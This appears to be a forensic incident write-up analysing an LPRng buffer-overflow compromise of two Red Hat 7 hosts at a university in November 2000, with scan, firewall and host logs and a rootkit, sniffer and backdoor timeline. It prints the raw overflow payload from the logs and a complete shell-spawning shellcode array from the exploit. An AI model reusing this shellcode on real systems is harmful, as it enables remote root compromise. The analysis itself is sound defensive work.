INTRODUCTION
On Nov 25, 2000 two machines on our network were compromised during one attack. 

It appears the Suspect was searching specifically for Redhad 7 machines.  After a scan of our network to port 21, two machines were found to be running Redhat 7. 
LprNG exploit was then executed against each machine from a different IP address than the one conducting the scan. 
Both machines were successfully exploited, giving the suspect root access. 

  • A connection was established to a third IP address and the rootkit was downloaded via TCP 514 (rcp).
  • The rootkit replaced several standard unix commands with commands altered to prevent their processes, files and network activity from being displayed.
  • A sniffer was installed and configured to capture data to and from ports 23 (telnet), 110 (pop), 143 (imap) and 21 (ftp).
  • Outgoing ICMP connections were established  at regular intervals to a forth IP address and data was being sent out.
  • The sendmail command was replaced with a trojaned one which installed a ssh backdoor (TCP 15000).
  • System startup files were altered to reactivate the sniffer.
  • The login command was replaced with one which included a backdoor.
  • This document presents the entire picture of the incident.  Most of the information in this document refers to Victim#1, however Victim#2's compromise was identical (except where noted) 

    The information is organized into three sections. 

  • The Recon/Scan
  • The Attack
  • The Compromise/ Discovery
  • THE CAST
     The Bad
    205.177.91.2
    BadGuy IP#1 (205.177.91.2) 
  • Source of both scans.
  • Source of Exploit Attack
  • 210.94.114.48
    BadGuy IP #2 (210.94.114.48 )
    38.246.1.9
    BadGuyIP #3
    18.242.162.210
    BadGuyIP #4
    The Good
    X.X.8.60
    Victim#1
    X.X.167.56
    Victim#2
    THE LOGS
    SnortLogs
    Snort was running inside the network on the backbone segment.  The machines which were compromised were on 2 different segments of the network.  The information analyzed by snort is therefore limited. This information offers detailed information on the network scans. 

    TCPDump Logs
    Tcpdump was capturing data inside the network.  Tcpdump was also running on the backbone segment of our network. This information captured is therefore limited. This information offers detailed information on the Nov 25th network scan as well as some detailed information on icmp packets sent from the compromised machines. 

    Firewall Logs
    Our organization is a dot.edu.  Our firewall is a commercial package which was included (as a bonus) to the web filtering system we purchased.  The information which is logged is inadequate for complete ID analysis. However even incomplete logging is better than no logging.  This logs offers the greatest amount of information on the attack.  The firewall logs are in the following format: 

    StartTime, EndTime, SrcIP, DstIP, SrcPort, DstPort, service, ConnectionDuration,PktsSent, PktsRcvd, FirewallAction
    Host (Victim)  Logfiles
    Logfiles gathered from each compromised system provides information on the method of attack.  Most importantly, they provide the information needed to understand the events which triggered various entries in the network logs. 

    The Recon/Scan

    Overview

    Observations
  • The scans originated from 205.177.91.2
  • The following logfiles are small sections from very large log files.
  • There were two recent scans discovered which originated from this IP address.  Nov 5 was a SYN scan for linuxconf and on Nov 25 a SYN scan for telnet.
  • The scans are fast TCP SYN scans destined for a specific port. 
  • In the Nov 25th scan (and attack) there were 17,936 connections from this location with all src ports between 1025 and 4999. 
  • The same IP Addres is used to execute the buffer overflow after vulnerable systems are located after the Nov 25th scan.
  • Nov 5, 2000 - SNORT Portscan.log

    Nov  5 13:14:07 205.177.91.2:1809 -> X.X.128.6:98 SYN **S***** 
    Nov  5 13:14:07 205.177.91.2:1807 -> X.X.128.4:98 SYN **S***** 
    Nov  5 13:14:07 205.177.91.2:1808 -> X.X.128.5:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1830 -> X.X.128.27:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1831 -> X.X.128.28:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1832 -> X.X.128.29:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1919 -> X.X.128.51:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2074 -> X.X.128.112:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2075 -> X.X.128.113:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2190 -> X.X.128.134:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2076 -> X.X.128.114:98 SYN **S***** 
    Nov  5 13:14:12 205.177.91.2:1947 -> X.X.128.79:98 SYN **S***** 
    Nov  5 13:14:12 205.177.91.2:2356 -> X.X.128.188:98 SYN **S***** 

    Nov 25, 2000 - SNORT Portscan.Log

    Nov 25 14:02:53 205.177.91.2:2654 -> X.X.128.4:23 SYN **S***** 
    Nov 25 14:02:53 205.177.91.2:2656 -> X.X.128.5:23 SYN **S***** 
    Nov 25 14:02:53 205.177.91.2:2664 -> X.X.128.6:23 SYN **S***** 
    Nov 25 14:02:53 205.177.91.2:2701 -> X.X.128.27:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2762 -> X.X.128.60:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2794 -> X.X.128.70:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2807 -> X.X.128.81:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2813 -> X.X.128.79:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2808 -> X.X.128.80:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2817 -> X.X.128.76:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2945 -> X.X.128.131:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2949 -> X.X.128.132:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2951 -> X.X.128.134:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2952 -> X.X.128.133:23 SYN **S***** 
    Nov 25 14:02:56 205.177.91.2:3052 -> X.X.128.188:23 SYN **S***** 
    Nov 25 14:02:56 205.177.91.2:3104 -> X.X.128.210:23 SYN **S***** 
    Nov 25 14:02:57 205.177.91.2:3125 -> X.X.128.219:23 SYN **S***** 
    Nov 25 14:02:57 205.177.91.2:3119 -> X.X.128.225:23 SYN **S*****

    Nov 25 - SNORT ALERT LOG

    11/25-14:09:16.266354 0:0:EF:3:80:F0 -> 0:0:EF:3:4D:60 type:0x800 len:0x4A
    205.177.91.2:1173 -> X.X.210.38:23 TCP TTL:51 TOS:0x0 ID:36580  DF
    **S***** Seq: 0x1D02DE67   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17364876 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:17.411780 0:0:EF:3:80:F0 -> 0:10:4B:2A:F1:14 type:0x800 len:0x4A
    205.177.91.2:1548 -> X.X.133.7:23 TCP TTL:51 TOS:0x0 ID:59620  DF
    **S***** Seq: 0x654D3B7   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17328985 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:17.423929 0:0:EF:3:80:F0 -> 0:50:DA:2C:12:9A type:0x800 len:0x4A
    205.177.91.2:1562 -> X.X.133.15:23 TCP TTL:51 TOS:0x0 ID:59634  DF
    **S***** Seq: 0x62F807C   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17328986 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:18.374003 0:0:EF:3:80:F0 -> 0:1:2:29:8B:DD type:0x800 len:0x4A
    205.177.91.2:1630 -> X.X.133.48:23 TCP TTL:51 TOS:0x0 ID:59748  DF
    **S***** Seq: 0x622515D   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17329085 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:18.413957 0:0:EF:3:80:F0 -> 0:80:C8:1E:11:E1 type:0x800 len:0x4A
    205.177.91.2:1640 -> X.X.133.52:23 TCP TTL:51 TOS:0x0 ID:59761  DF
    **S***** Seq: 0x684A0BC   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17329090 0 NOP WS: 0 

    Nov 25 - TCPDUMP

    14:02:53.601174 0:0:ef:3:80:f0 0:a0:36:0:85:cb 0800 74: 205.177.91.2.2654 > X.X.128.4.23: S 69699773:69699773(0) win 32120 <mss 380,sackOK,timestamp 17326609 0,nop,wscale 0> (DF)
    0x0000   4500 003c dd82 4000 3306 2a85 cdb1 5b02        E..<..@.3.*...[.
    0x0010   5858 8004 0a5e 0017 0427 88bd 0000 0000        .....^...'......
    0x0020   a002 7d78 949f 0000 0204 017c 0402 080a        ..}x.......|....
    0x0030   0108 6211 0000 0000 0103 0300                   ..b.........
    14:02:53.615573 0:0:ef:3:80:f0 0:a0:36:0:81:cb 0800 74: 205.177.91.2.2656 > X.X.128.5.23: S 58155330:58155330(0) win 32120 <mss 380,sackOK,timestamp 17326609 0,nop,wscale 0> (DF)
    0x0000   4500 003c dd84 4000 3306 2a82 cdb1 5b02        E..<..@.3.*...[.
    0x0010   5858 8005 0a60 0017 0377 6142 0000 0000        .....`...waB....
    0x0020   a002 7d78 bcc7 0000 0204 017c 0402 080a        ..}x.......|....
    0x0030   0108 6211 0000 0000 0103 0300                   ..b.........
    14:02:53.635891 0:0:ef:3:80:f0 0:a0:36:0:84:32 0800 74: 205.177.91.2.2664 > X.X.128.6.23: S 63619730:63619730(0) win 32120 <mss 380,sackOK,timestamp 17326610 0,nop,wscale 0> (DF)
    0x0000   4500 003c dd8c 4000 3306 2a79 cdb1 5b02        E..<..@.3.*y..[.
    0x0010   5858 8006 0a68 0017 03ca c292 0000 0000        .....h..........
    0x0020   a002 7d78 5b1a 0000 0204 017c 0402 080a        ..}x[......|....
    0x0030   0108 6212 0000 0000 0103 0300                   ..b.........
    14:02:53.750509 0:20:48:58:2:af 0:0:ef:3:80:f0 0800 62:  X.X.128.23.23 > 205.177.91.2.2695: S 703593917:703593917(0) ack 55667634 win 8192 <mss 512,nop,wscale 0>
    0x0000   4500 0030 a17c 0000 4006 9984 5858 8017        E..0.|..@.......
    0x0010   cdb1 5b02 0017 0a87 29ef fdbd 0351 6bb2        ..[.....)....Qk.
    0x0020   7012 2000 86ad 0000 0204 0200 0103 0300        p...............
    14:02:53.865766 0:0:ef:3:80:f0 0:50:4:61:85:98 0800 74: 205.177.91.2.2701 > X.X.128.27.23: S 68115308:68115308(0) win 32120 <mss 380,sackOK,timestamp 17326627 0,nop,wscale 0> (DF)
    0x0000   4500 003c ddb4 4000 3306 2a3c cdb1 5b02        E..<..@.3.*<..[.
    0x0010   5858 801b 0a8d 0017 040f 5b6c 0000 0000        ..........[l....
    0x0020   a002 7d78 c1b0 0000 0204 017c 0402 080a        ..}x.......|....
    0x0030   0108 6223 0000 0000 0103 0300                   ..b#........

    Nov 25 - FIREWALL LOGS

    (Format: StartTime, EndTime, SrcIP, DstIP, SrcPort, DstPort, service, ConnectionDuration in seconds,PktsSent, PktsRcvd, FirewallAction) 

    14:01:37 14:02:54 205.177.91.2 X.X.128.10  2674 23 telnet 0 0 0 Deny
    14:01:37 14:02:54 205.177.91.2 X.X.128.50  2744 23 telnet 0 0 0 Deny
    14:01:37 14:03:13 205.177.91.2 X.X.128.12  2678 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.13  2680 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.17  2684 23 telnet  7 367 374 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.2   2647 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.24  2697 23 telnet  7 270 314 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.27  2701 23 telnet  7 60 74 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.29  2705 23 telnet  7 369 374 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.3   2652 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.4   2654 23 telnet  7 629 314 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.5   2656 23 telnet  7 634 374 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.51  2746 23 telnet  7 60 74 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.6   2664 23 telnet  7 634 314 Permit
    14:01:37 14:35:40 205.177.91.2 X.X.128.23  2695 23 telnet  1955 302 314 Permit
    14:01:38 14:02:56 205.177.91.2 X.X.128.108 2868 23 telnet  0 0 0 Deny
    14:01:38 14:02:56 205.177.91.2 X.X.128.109 2887 23 telnet  0 0 0 Deny
    14:01:38 14:02:56 205.177.91.2 X.X.128.78  2814 23 telnet  0 0 0 Deny
    14:01:38 14:03:13 205.177.91.2 X.X.128.106 2870 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.107 2869 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.60  2762 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.70  2794 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.76  2817 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.79  2813 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.80  2808 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.81  2807 23 telnet  6 431 494 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.84  2844 23 telnet  6 71 74 Permit
    14:01:39 14:03:13 205.177.91.2 X.X.128.125 2923 23 telnet  5 60 74 Permit
    14:01:39 14:03:13 205.177.91.2 X.X.128.133 2952 23 telnet  5 70 74 Permit
    14:01:39 14:03:13 205.177.91.2 X.X.128.134 2951 23 telnet  5 70 74 Permit

    The Exploit
    The SYN scan produced 2 vulnerable machines.  Both were RedHat 7 Linux. 
    Victim #1 is X.X.8.60; Victim #2 is X.X.167.56 

    This log is from the firewall application. I have numbered each line of the logfile and reference these line numbers in the explaination that follows.

     1. 14:04:08 14:37:57 205.177.91.2 X.X.159.254 4940 23 telnet  1949 624 0 Permit
     2. 14:37:08 14:38:59 210.94.114.48 X.X.8.60 4573 23 telnet  23 1059 1054 Permit
     3. 14:37:36 14:39:09 205.177.91.2 X.X.8.60 1868 515 TCP(515)  5 272 763 Permit
     4. 14:37:36 14:39:09 205.177.91.2 X.X.8.60 1880 3879 TCP(3879)  5 60 74 Permit
     5. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2296 515 TCP(515) 7 272 761 Permit
     6. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2299 3879 TCP(3879) 7 60 74 Permit
     7. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2306 515 TCP(515)  7 272 761 Permit
     8. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2311 3879 TCP(3879)  7 60 74 Permit
     9. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2316 515 TCP(515) 7 272 761 Permit
    10. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2327 3879 TCP(3879)  7 120 148 Permit
    11. 14:37:47 14:39:19 205.177.91.2 X.X.8.60 2498 515 TCP(515)  4 272 761 Permit
    12. 14:37:47 14:39:19 205.177.91.2 X.X.8.60 2509 3879 TCP(3879)  4 60 74 Permit
    13. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2516 515 TCP(515)  3 272 761 Permit
    14. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2532 3879 TCP(3879)  3 60 74 Permit
    15. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2535 515 TCP(515)  3 272 761 Permit
    16. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2549 3879 TCP(3879)  3 60 74 Permit
    17. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2553 515 TCP(515)  3 272 761 Permit
    18. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2563 3879 TCP(3879)  3 60 74 Permit
    19. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2580 515 TCP(515)  3 272 761 Permit
    20. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2594 3879 TCP(3879)  3 60 74 Permit
    21. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2605 515 TCP(515)  3 272 761 Permit
    22. 14:37:49 14:39:19 205.177.91.2 X.X.8.60 2628 3879 TCP(3879)  2 60 74 Permit
    +
    +<clipped>
    +
    23. 14:38:44 14:40:20 205.177.91.2 X.X.8.60 2358 515 TCP(515)  8 272 756 Permit
    24. 14:38:44 14:40:20 205.177.91.2 X.X.8.60 2369 3879 TCP(3879)  8 60 74 Permit
    25. 14:38:44 14:40:20 205.177.91.2 X.X.8.60 2373 515 TCP(515)  8 272 756 Permit
    26. 14:38:44 14:40:20 205.177.91.2  X.X.8.60 2376 3879 TCP(3879)  8 60 74 Permit
    27. 14:38:44 14:42:20 205.177.91.2 X.X.8.60 2319 515 TCP(515) 128 544 1632 Permit
    28. 14:38:45 14:40:20 205.177.91.2 X.X.8.60 2380 515 TCP(515) 7 272 756 Permit
    29. 14:38:45 14:40:20 205.177.91.2 X.X.8.60 2392 3879 TCP(3879)  7 60 74 Permit
    30. 14:38:45 14:40:20 205.177.91.2 X.X.8.60 2399 515 TCP(515)  7 272 756 Permit
    31. 14:41:20 14:42:50 205.177.91.2 X.X.8.60 1136 515 TCP(515)  2 272 764 Permit
    32. 14:41:20 14:42:50 205.177.91.2 X.X.8.60 1147 3879 TCP(3879)  2 60 74 Permit
    33. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1149 515 TCP(515)  1 284 759 Permit
    34. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1168 3879 TCP(3879) 1 60 74 Permit
    35. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1176 3879 TCP(3879)  1 60 74 Permit
    36. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1183 515 TCP(515)  1 272 767 Permit
    37. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1188 3879 TCP(3879)  1 60 74 Permit
    38. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1207 3879 TCP(3879)  1 60 74 Permit
    39. 14:41:22 14:42:50 205.177.91.2 X.X.8.60 1218 3879 TCP(3879)  1 60 74 Permit
    40. 14:41:22 15:13:13 205.177.91.2 X.X.8.60 1236 515 TCP(515)  1823 206 697 Permit
    41. 14:42:23 14:45:54 X.X.8.60 38.246.1.9 1023 514 TCP(514)  133 1222215 112064 Permit
    42. 14:44:26 14:45:44 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny
    43. 14:44:27 14:45:46 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny 
    44. 14:44:28 14:45:46 210.94.114.48 X.X.8.60 icmp 0 0 0 Deny 
    45. 14:44:29 14:45:48 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny 
    46. 14:44:30 14:45:48 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny 
    47. 14:44:51 14:46:14 X.X.8.60 18.242.162.210 icmp 5 0 1058 Permit
    48. 14:45:15 14:48:15 205.177.91.2 X.X.8.60 1023 15000 TCP(15000)  92 2259 2169 Permit
    49. 14:46:01 14:47:25 X.X.8.60 18.242.162.210 icmp  5 0 1058 Permit 
    50. 14:46:13 14:48:15 210.94.114.48 X.X.98.224 4574 23 telnet 34 1058 1006 Permit
    51. 14:47:03 14:48:25 X.X.8.60 18.242.162.210 icmp 4 0 1058 Permit 
    52. 14:47:03 14:49:46 210.94.114.48 X.X.98.224 936 111 UDP(111)  75 0 392 Permit
    53. 14:47:24 14:49:16 210.94.114.48 X.X.167.56 4575 23 telnet  24 993 1006 Permit
    54. 14:47:53 14:49:26 205.177.91.2 X.X.167.56 3228 515 TCP(515)  5 272 763 Permit
    55. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3230 515 TCP(515)  7 272 761 Permit
    56. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3231 3879 TCP(3879) 7 60 74 Permit
    57. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3232 515 TCP(515)  7 272 761 Permit
    58. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3233 3879 TCP(3879)  7 60 74 Permit

    Explaination of Firewall Logfile

    Line 1. The last scan entry from the firewall log indicates the connection closed at 14:37:57.
    Line 2. A telnet connection is made to Victim#1 from an BadGuyIP#2.
    Line 3,4. BadGuyIP#1 connects to LPR port (515) AND TCP 3879.
    Line 5-30.  Followed by a series of connections alternating between port 515 and 3879.
    Line 40.  We have root!
    Line 41. Notice the last connection to TCP515 is still active when a connection from Victim#1 port 1023 to BadGuyIP#3 port 514.
     
    Observations:
  • Connection lasts appx 3.5 minutes.
  • Connection originates on Victim#1.
  • Dst IP (BadGuyIP#3) is different than the previous two BadGuyIPs. This IP was actually found in a script left in the rootkit directory. The Badguy uses rcp (TCP-514) to copy files to the victim machine.
  • Src port is 1023! You will see this again!
  • Line 42-46. There are a few icmp attempts from BadGuyIP#2.  Could he be testing to find out if our network allows incoming icmp? (We don't.)
    Line 47. BadGuy uses ICMP replies.  (There are NO requests)
    Sniffer is now being setup to send data out

     
    Observations 
    • Originating IP is Victim#1.
    • Destination is BadGuyIP#4.
    • Connection duration is 5 seconds.
    • There are no pkts sent.
    • Pkts rcvd are 1058. This pkt size remains consistent.
    Line 48. BadGuyIP#1 connects to TCP15000 using src port 1023. Sshd has now been installed (on TCP 15000) and is running on Victim#1. 
    Line 49-51. A couple more outgoing ICMP connections.  These become regular events from both Victim's over the next few days.
    Line 50, 52. But now there is something really odd. Two  isolated incoming connection from BadGuy IP#2 to a different machine on our network (X.X.98.224).
    Could this machine have been Victim#3? 
    Observations:
  • Line 50, the src port is 4574.
  • Line 51, UDP traffic; src port is 936 and dst port 111
  • Line 53-58. Now we begin the attack on Victim#2.
    Observation:
  • The attack begins the same as VictimIP#1.
  • The src port in the telnet connection to VictimIP#2  below is 4575.  Put this next to the telnet in line 50.  This increases the possiblility that X.X.98.224 was an intended victim
  • Victim#1 -  LogFiles
    /var/log/messages
     1. Nov 25 14:39:09 Victim#1 SERVER[1616]: Dispatch_input: bad request line 'BBìóÿ
    ¿íóÿ¿îóÿ¿ïóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000048secursecurity000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000001074433944~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@
    ~Iå1Ò²f~IÐ1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IMð~MEì~IEøÆEü^P~IÐ~
    MôÍ~@~IÐCCÍ~@~IÐCÍ~@~IÃ1ɲ?~IÐÍ~@~IÐAÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K
    ~Ió~MM^H~MU^LÍ~@èãÿÿÿ/bin/sh' 
    <clipped>
     2. Nov 25 14:42:55 Victim#1 SERVER[2393]: Dispatch_input: bad request line 'BBàóÿ
    ¿áóÿ¿âóÿ¿ãóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000004800000001074433944security000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000001074401432^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P1Û1É1À°FÍ^@ 
          å1Ò²f   Ð1É     ËC      ]øC     ]ôK        Mü^MMôÍ^@1É     EôCf    ]ìfÇEî^O'
           Mð^MEì  EøÆEü^P Ð^MMôÍ^@        ÐCCÍ^@  ÐCÍ^@   Ã1ɲ?   ÐÍ^@    ÐAÍ^@ë^X^  
         u^H1F^G E^L°^K  ó^MM^H^MU^LÍ^@èãÿÿÿ/bin/sh'
     3. Nov 25 14:46:14 Victim#1 kernel: lpsched uses obsolete (PF_INET,SOCK_PACKET)
     4. Nov 25 14:46:14 Victim#1 kernel: eth0: Setting promiscuous mode.
     5. Nov 25 14:46:14 Victim#1 kernel: device eth0 entered promiscuous mode
     6. Nov 25 14:50:00 Victim#1 CROND[2725]: (root) CMD (   /sbin/rmmod -as) 
     7. Nov 25 15:00:00 Victim#1 CROND[2737]: (root) CMD (   /sbin/rmmod -as) 
     8. Nov 25 15:01:00 Victim#1 CROND[2740]: (root) CMD (run-parts /etc/cron.hourly) 
     9. Nov 25 15:03:48 Victim#1 PAM_unix[2747]: authentication failure; (uid=0) -> root for system-auth service


    Line 1. This is the first entry of the buffer overflow attack.
    Even though I do not have the tcpdump of this attack, I can translate the characters to hex and confirm the exploit used was almost identical (if not the same) as the one posted on SANS GIAC Jan 22, 2001 by Chris Talianekte. 

    The source code which I believe executed this attack includes identical hex code including the 0x0f27 which Chris suggests might be a clue to the odd alternating port connections during the buffer overflow.  I am not a C programmer, however the source code does specifically refer to ports htons(515) and htons(3879).

    char shellcode[] =

      "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
      "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
      "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
      "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
      "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
      "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
      "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
      "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
      "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
     

    Again, the times recorded in this messages logfile were from Victim#1. The time difference in the various machines makes it difficult to synchronize the logfiles between machines.

    There were 682 entries between 14:39:09 and 14:42:55 in the /var/log/messages file similar to this entry.
    There was one final entry at 15:04:47.

    Line 3-5. This entry was made by the application lpsched .
    Line 9. At 15:03, it appears the suspect had an authentication error. This is the same time there is the telnet connect from Victim#2.  There is one more entry similar to the previous buffer overflows at 15:04:47, but it is an isolated connect. Perhaps the suspect had a few problems and this last attempt corrected them.
     

    /var/log/secure

     1. Nov 25 13:54:04 Victim#1 xinetd[470]: START: telnet pid=1594 from=205.177.91.2
     2. Nov 25 13:54:09 Victim#1 login: FAILED LOGIN SESSION FROM x-press.net FOR (null), Error in service module
     3. Nov 25 14:38:41 Victim#1 xinetd[470]: START: telnet pid=1614 from=210.94.114.48
     4. Nov 25 15:03:43 Victim#1 xinetd[470]: START: telnet pid=2746 from=X.X.167.56



    Line 1,2. The original scan connection which occured during the full network scan from BadGuyIP#1.
    Line 3. This is the telnet connection which immediately preceeded the attack. 
    Observation:
    The time shown here is the time on Victim#1, the firewall log time is the time on the firewall.
    This connection lets us determine the timing difference. 
    For a complete understanding of the attack, time difference are critical.
    Line 4. This is interesting! We have an incoming telnet connection from Victim#2 TO Victim#1.
    This connection is also recorded on both victim machines in the BadGuy'ssniffer file on Victim#2. 
    It is not recorded in Victim#1's sniffer file.
    Victim#2 - Beginning of captured sniffer file.
    ============================================
    Time: Sat Nov 25 14:59:37     Size: 256
    Path: X.X.167.56 => ftp.UU.NET [21]
    --------------------------------------------
    <I clipped this>
    ============================================
    Time: Sat Nov 25 15:01:18     Size: 256
    Path: X.X.167.56 => X.X.8.60 [23]
    --------------------------------------------
    44
    e4
    e !"'#8
    e8
    e9
    e:
    eE
    e
    er
    e>
    eootA
    e

    Victim#1- Begining of captured sniffer file
    =======================================
    Time: Sat Nov 25 14:59:46     Size: 4
    Path: X.X.8.115 => X.X.MailServer [110]
    ---------------------------------------

    ========================================
    Time: Sat Nov 25 15:03:43     Size: 256
    Path: X.X.167.56 => X.X.8.60 [23]
    ----------------------------------------
    44
    e4
    e !"'#8
    e8
    e9
    e:
    eE
    e
    er
